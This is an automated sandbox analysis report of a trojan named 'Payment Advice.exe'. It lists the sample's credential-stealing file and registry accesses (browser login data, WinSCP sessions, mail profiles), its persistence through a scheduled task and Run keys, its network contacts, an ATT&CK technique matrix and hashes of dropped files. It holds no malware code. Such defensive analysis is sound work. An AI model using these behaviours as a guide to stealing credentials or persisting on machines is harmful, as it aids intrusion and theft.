                    Source: C:\Users\user\Desktop\Payment Advice.exe, Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                    Source: C:\Users\user\Desktop\Payment Advice.exe, Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                    Source: C:\Users\user\Desktop\Payment Advice.exe, Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exe, Queries volume information: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exe VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exe, Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exe, Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exe, Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exe, Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exe, Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe, Queries volume information: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe, Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe, Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe, Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe, Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe, Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                    Source: C:\Users\user\Desktop\Payment Advice.exe, Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                    Stealing of Sensitive Information

                    Source: Yara match, File source: 0.2.Payment Advice.exe.4c84a08.2.unpack, type: UNPACKEDPE
                    Source: Yara match, File source: 9.2.sFPEKzHsLkYZIz.exe.4e65888.4.unpack, type: UNPACKEDPE
                    Source: Yara match, File source: 9.2.sFPEKzHsLkYZIz.exe.4e2a668.3.unpack, type: UNPACKEDPE
                    Source: Yara match, File source: 20.2.BjTxJte.exe.3ce4260.1.unpack, type: UNPACKEDPE
                    Source: Yara match, File source: 0.2.Payment Advice.exe.4c497e8.1.unpack, type: UNPACKEDPE
                    Source: Yara match, File source: 14.2.BjTxJte.exe.41c5ac8.2.unpack, type: UNPACKEDPE
                    Source: Yara match, File source: 0.2.Payment Advice.exe.4c84a08.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara match, File source: 20.2.BjTxJte.exe.3d1f480.2.unpack, type: UNPACKEDPE
                    Source: Yara match, File source: 20.2.BjTxJte.exe.3d1f480.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara match, File source: 9.2.sFPEKzHsLkYZIz.exe.4e65888.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara match, File source: 0.2.Payment Advice.exe.4c497e8.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara match, File source: 14.2.BjTxJte.exe.41c5ac8.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara match, File source: 20.2.BjTxJte.exe.3ce4260.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara match, File source: 9.2.sFPEKzHsLkYZIz.exe.4e2a668.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara match, File source: 00000008.00000002.4124616083.0000000002D5C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match, File source: 0000000D.00000002.4124167230.000000000292B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match, File source: 0000000E.00000002.1852266538.00000000041C5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match, File source: 00000008.00000002.4124616083.0000000002D31000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match, File source: 0000000D.00000002.4124167230.00000000028E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match, File source: 00000014.00000002.1933792023.0000000003CE4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match, File source: 00000013.00000002.4125579074.0000000002DD1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match, File source: 00000008.00000002.4124616083.0000000002D64000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match, File source: 00000009.00000002.1760226964.0000000004E2A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match, File source: 0000000D.00000002.4115682058.0000000000431000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match, File source: 00000019.00000002.4125631218.0000000002D9B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match, File source: 00000013.00000002.4125579074.0000000002DFC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match, File source: 00000000.00000002.1712393138.0000000004C49000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match, File source: Process Memory Space: Payment Advice.exe PID: 6700, type: MEMORYSTR
                    Source: Yara match, File source: Process Memory Space: Payment Advice.exe PID: 7404, type: MEMORYSTR
                    Source: Yara match, File source: Process Memory Space: sFPEKzHsLkYZIz.exe PID: 7524, type: MEMORYSTR
                    Source: Yara match, File source: Process Memory Space: sFPEKzHsLkYZIz.exe PID: 7816, type: MEMORYSTR
                    Source: Yara match, File source: Process Memory Space: BjTxJte.exe PID: 7952, type: MEMORYSTR
                    Source: Yara match, File source: Process Memory Space: BjTxJte.exe PID: 6576, type: MEMORYSTR
                    Source: Yara match, File source: Process Memory Space: BjTxJte.exe PID: 7492, type: MEMORYSTR
                    Source: Yara match, File source: Process Memory Space: BjTxJte.exe PID: 4092, type: MEMORYSTR
                    Source: C:\Users\user\Desktop\Payment Advice.exe, Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exe, Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe, Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe, File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe, File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe, File opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe, File opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe, File opened: C:\FTP Navigator\Ftplist.txt
                    Source: C:\Users\user\Desktop\Payment Advice.exe, File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                    Source: C:\Users\user\Desktop\Payment Advice.exe, Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
                    Source: C:\Users\user\Desktop\Payment Advice.exe, Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exe, File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exe, Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exe, Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe, File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe, Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe, Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities

                    Remote Access Functionality

                    Source: Yara match, File source: 0.2.Payment Advice.exe.4c84a08.2.unpack, type: UNPACKEDPE
                    Source: Yara match, File source: 9.2.sFPEKzHsLkYZIz.exe.4e65888.4.unpack, type: UNPACKEDPE
                    Source: Yara match, File source: 9.2.sFPEKzHsLkYZIz.exe.4e2a668.3.unpack, type: UNPACKEDPE
                    Source: Yara match, File source: 20.2.BjTxJte.exe.3ce4260.1.unpack, type: UNPACKEDPE
                    Source: Yara match, File source: 0.2.Payment Advice.exe.4c497e8.1.unpack, type: UNPACKEDPE
                    Source: Yara match, File source: 14.2.BjTxJte.exe.41c5ac8.2.unpack, type: UNPACKEDPE
                    Source: Yara match, File source: 0.2.Payment Advice.exe.4c84a08.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara match, File source: 20.2.BjTxJte.exe.3d1f480.2.unpack, type: UNPACKEDPE
                    Source: Yara match, File source: 20.2.BjTxJte.exe.3d1f480.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara match, File source: 9.2.sFPEKzHsLkYZIz.exe.4e65888.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara match, File source: 0.2.Payment Advice.exe.4c497e8.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara match, File source: 14.2.BjTxJte.exe.41c5ac8.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara match, File source: 20.2.BjTxJte.exe.3ce4260.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara match, File source: 9.2.sFPEKzHsLkYZIz.exe.4e2a668.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara match, File source: 00000008.00000002.4124616083.0000000002D5C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match, File source: 0000000D.00000002.4124167230.000000000292B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match, File source: 0000000E.00000002.1852266538.00000000041C5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match, File source: 00000008.00000002.4124616083.0000000002D31000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match, File source: 0000000D.00000002.4124167230.00000000028E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match, File source: 00000014.00000002.1933792023.0000000003CE4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match, File source: 00000013.00000002.4125579074.0000000002DD1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match, File source: 00000008.00000002.4124616083.0000000002D64000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match, File source: 00000009.00000002.1760226964.0000000004E2A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match, File source: 0000000D.00000002.4115682058.0000000000431000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match, File source: 00000019.00000002.4125631218.0000000002D9B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match, File source: 00000013.00000002.4125579074.0000000002DFC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match, File source: 00000000.00000002.1712393138.0000000004C49000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match, File source: Process Memory Space: Payment Advice.exe PID: 6700, type: MEMORYSTR
                    Source: Yara match, File source: Process Memory Space: Payment Advice.exe PID: 7404, type: MEMORYSTR
                    Source: Yara match, File source: Process Memory Space: sFPEKzHsLkYZIz.exe PID: 7524, type: MEMORYSTR
                    Source: Yara match, File source: Process Memory Space: sFPEKzHsLkYZIz.exe PID: 7816, type: MEMORYSTR
                    Source: Yara match, File source: Process Memory Space: BjTxJte.exe PID: 7952, type: MEMORYSTR
                    Source: Yara match, File source: Process Memory Space: BjTxJte.exe PID: 6576, type: MEMORYSTR
                    Source: Yara match, File source: Process Memory Space: BjTxJte.exe PID: 7492, type: MEMORYSTR
                    Source: Yara match, File source: Process Memory Space: BjTxJte.exe PID: 4092, type: MEMORYSTR
                    Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
                    Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 121 Windows Management Instrumentation | 1 DLL Side-Loading | 1 DLL Side-Loading | 11 Disable or Modify Tools | 2 OS Credential Dumping | 1 File and Directory Discovery | Remote Services | 11 Archive Collected Data | 1 Ingress Tool Transfer | Exfiltration Over Other Network Medium | Abuse Accessibility Features
                    Credentials | Domains | Default Accounts | 1 Scheduled Task/Job | 1 Scheduled Task/Job | 112 Process Injection | 1 Deobfuscate/Decode Files or Information | 21 Input Capture | 24 System Information Discovery | Remote Desktop Protocol | 2 Data from Local System | 11 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service
                    Email Addresses | DNS Server | Domain Accounts | At | 1 Registry Run Keys / Startup Folder | 1 Scheduled Task/Job | 3 Obfuscated Files or Information | 1 Credentials in Registry | 1 Query Registry | SMB/Windows Admin Shares | 1 Email Collection | 1 Non-Standard Port | Automated Exfiltration | Data Encrypted for Impact
                    Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | 1 Registry Run Keys / Startup Folder | 12 Software Packing | NTDS | 211 Security Software Discovery | Distributed Component Object Model | 21 Input Capture | 2 Non-Application Layer Protocol | Traffic Duplication | Data Destruction
                    Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 DLL Side-Loading | LSA Secrets | 2 Process Discovery | SSH | 1 Clipboard Data | 23 Application Layer Protocol | Scheduled Transfer | Data Encrypted for Impact
                    Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 Masquerading | Cached Domain Credentials | 141 Virtualization/Sandbox Evasion | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
                    DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 141 Virtualization/Sandbox Evasion | DCSync | 1 Application Window Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
                    Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 112 Process Injection | Proc Filesystem | 1 System Network Configuration Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
                    Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 1 Hidden Files and Directories | /etc/passwd and /etc/shadow | Network Sniffing | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
                    Behavior Graph (ID: 1428252, Sample: Payment Advice.exe, Startdate: 18/04/2024, Architecture: WINDOWS, Score: 100)
                    Network nodes shown in the graph: mail.seawaysfreight-bd.com; seawaysfreight-bd.com, 94.100.26.91 (HVC-ASUS, Netherlands); api.ipify.org, 104.26.13.205 (CLOUDFLARENETUS, United States)

Source | Detection | Scanner | Label | Link
Payment Advice.exe | 39% | ReversingLabs | ByteCode-MSIL.Trojan.GenSteal |
Payment Advice.exe | 100% | Joe Sandbox ML | |

Source | Detection | Scanner | Label | Link
C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe | 100% | Joe Sandbox ML | |
C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exe | 100% | Joe Sandbox ML | |
C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe | 42% | ReversingLabs | ByteCode-MSIL.Trojan.GenSteal |
C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exe | 42% | ReversingLabs | ByteCode-MSIL.Trojan.GenSteal |
                    No Antivirus matches
                    No Antivirus matches
Name | IP | Active | Malicious | Antivirus Detection | Reputation
seawaysfreight-bd.com | 94.100.26.91 | true | false | | unknown
api.ipify.org | 104.26.13.205 | true | false | | high
mail.seawaysfreight-bd.com | unknown | unknown | true | | unknown

Name | Malicious | Antivirus Detection | Reputation
https://api.ipify.org/ | false | | high
IP | Domain | Country | Flag | ASN | ASN Name | Malicious
104.26.13.205 | api.ipify.org | United States | | 13335 | CLOUDFLARENETUS | false
94.100.26.91 | seawaysfreight-bd.com | Netherlands | | 29802 | HVC-ASUS | false
Joe Sandbox version: 40.0.0 Tourmaline
Analysis ID: 1428252
Start date and time: 2024-04-18 18:25:07 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 12m 53s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed: 27
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: Payment Advice.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@33/20@2/2
                                                                      EGA Information:
                                                                      • Successful, ratio: 100%
                                                                      HCA Information:
                                                                      • Successful, ratio: 96%
                                                                      • Number of executed functions: 423
                                                                      • Number of non-executed functions: 34
                                                                      Cookbook Comments:
                                                                      • Found application associated with file extension: .exe
                                                                      • Override analysis time to 240000 for current running targets taking high CPU consumption
                                                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                      • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                      • Not all processes where analyzed, report is missing behavior information
                                                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                                                      • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                      • Report size getting too big, too many NtCreateKey calls found.
                                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                                                      • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                      • VT rate limit hit for: Payment Advice.exe
                                                                      Time | Type | Description
                                                                      17:26:01 | Task Scheduler | Run new task: sFPEKzHsLkYZIz path: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exe
                                                                      17:26:02 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run BjTxJte C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe
                                                                      17:26:12 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run BjTxJte C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe
                                                                      18:25:58 | API Interceptor | 5006474x Sleep call for process: Payment Advice.exe modified
                                                                      18:26:00 | API Interceptor | 35x Sleep call for process: powershell.exe modified
                                                                      18:26:04 | API Interceptor | 489671x Sleep call for process: sFPEKzHsLkYZIz.exe modified
                                                                      18:26:14 | API Interceptor | 8015528x Sleep call for process: BjTxJte.exe modified
                                                                                    Process:C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe
                                                                                    File Type:CSV text
                                                                                    Category:dropped
                                                                                    Size (bytes):2056
                                                                                    Entropy (8bit):5.342567089024067
                                                                                    Encrypted:false
                                                                                    SSDEEP:48:MxHKlYHKh3ouHgJHreylEHMHKo/tHo6hAHKzeRHKx1qHKHxvj:iqlYqh3ou0aymsqwtI6eqzqqxwqRb
                                                                                    MD5:83A6E29FD802325CCCB720870B60C618
                                                                                    SHA1:4CD8AC6CA2659E4E32D1B27A8A4E77ABF980EE43
                                                                                    SHA-256:A81A5B984180553C06E7C9CAE0BAF7E195950801F493996F48FA59F1ACC135B2
                                                                                    SHA-512:69CC81145ACCA3D5C154D3A11396C2AFAEC4135662A82124EA249817BE7066D782DE2C79FE985E23F32F9709C144E2C513C727CFD1A88D677F34EB25E868B560
                                                                                    Malicious:false
                                                                                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"WindowsBase, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\WindowsBase\4d760e3e4675c4a4c66b64205fb0d001\WindowsBase.ni.dll",0..3,"PresentationCore, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\PresentationCore\17470ef0c7a174f38bdcadacc3e310ad\PresentationCore.ni.dll",0..3,"PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\Presentatio5ae0f00f#\
                                                                                    Process:C:\Users\user\Desktop\Payment Advice.exe
                                                                                    File Type:CSV text
                                                                                    Category:dropped
                                                                                    Size (bytes):2056
                                                                                    Entropy (8bit):5.342567089024067
                                                                                    Encrypted:false
                                                                                    SSDEEP:48:MxHKlYHKh3ouHgJHreylEHMHKo/tHo6hAHKzeRHKx1qHKHxvj:iqlYqh3ou0aymsqwtI6eqzqqxwqRb
                                                                                    MD5:83A6E29FD802325CCCB720870B60C618
                                                                                    SHA1:4CD8AC6CA2659E4E32D1B27A8A4E77ABF980EE43
                                                                                    SHA-256:A81A5B984180553C06E7C9CAE0BAF7E195950801F493996F48FA59F1ACC135B2
                                                                                    SHA-512:69CC81145ACCA3D5C154D3A11396C2AFAEC4135662A82124EA249817BE7066D782DE2C79FE985E23F32F9709C144E2C513C727CFD1A88D677F34EB25E868B560
                                                                                    Malicious:false
                                                                                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"WindowsBase, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\WindowsBase\4d760e3e4675c4a4c66b64205fb0d001\WindowsBase.ni.dll",0..3,"PresentationCore, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\PresentationCore\17470ef0c7a174f38bdcadacc3e310ad\PresentationCore.ni.dll",0..3,"PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\Presentatio5ae0f00f#\
                                                                                    Process:C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exe
                                                                                    File Type:CSV text
                                                                                    Category:dropped
                                                                                    Size (bytes):2056
                                                                                    Entropy (8bit):5.342567089024067
                                                                                    Encrypted:false
                                                                                    SSDEEP:48:MxHKlYHKh3ouHgJHreylEHMHKo/tHo6hAHKzeRHKx1qHKHxvj:iqlYqh3ou0aymsqwtI6eqzqqxwqRb
                                                                                    MD5:83A6E29FD802325CCCB720870B60C618
                                                                                    SHA1:4CD8AC6CA2659E4E32D1B27A8A4E77ABF980EE43
                                                                                    SHA-256:A81A5B984180553C06E7C9CAE0BAF7E195950801F493996F48FA59F1ACC135B2
                                                                                    SHA-512:69CC81145ACCA3D5C154D3A11396C2AFAEC4135662A82124EA249817BE7066D782DE2C79FE985E23F32F9709C144E2C513C727CFD1A88D677F34EB25E868B560
                                                                                    Malicious:false
                                                                                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"WindowsBase, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\WindowsBase\4d760e3e4675c4a4c66b64205fb0d001\WindowsBase.ni.dll",0..3,"PresentationCore, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\PresentationCore\17470ef0c7a174f38bdcadacc3e310ad\PresentationCore.ni.dll",0..3,"PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\Presentatio5ae0f00f#\
                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):2232
                                                                                    Entropy (8bit):5.379553825721504
                                                                                    Encrypted:false
                                                                                    SSDEEP:48:RWSU4xympjgs4RIoU99tK8NPZHUl7u1iMugeoM0Uyus:RLHxvCsIfA2KRHmOugU1s
                                                                                    MD5:CE7A29F24F012D1D5897D46340FBEA84
                                                                                    SHA1:DD109C4F3AB8581C65AA89C0EC3A8D025CDA6A78
                                                                                    SHA-256:8F979257E13783331F59E9AE8392784DB4A26F541FA01AADAACB5219FBD232CA
                                                                                    SHA-512:090891F557B6CC285FF3644B12056A36BBC1E5977D2A8ED4E735C8D01FE13689972885B3615136013A0E44D1BF6AC01546F210A310462D28AED7FA8A8816269F
                                                                                    Malicious:false
                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:ASCII text, with no line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):60
                                                                                    Entropy (8bit):4.038920595031593
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                    Malicious:false
                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
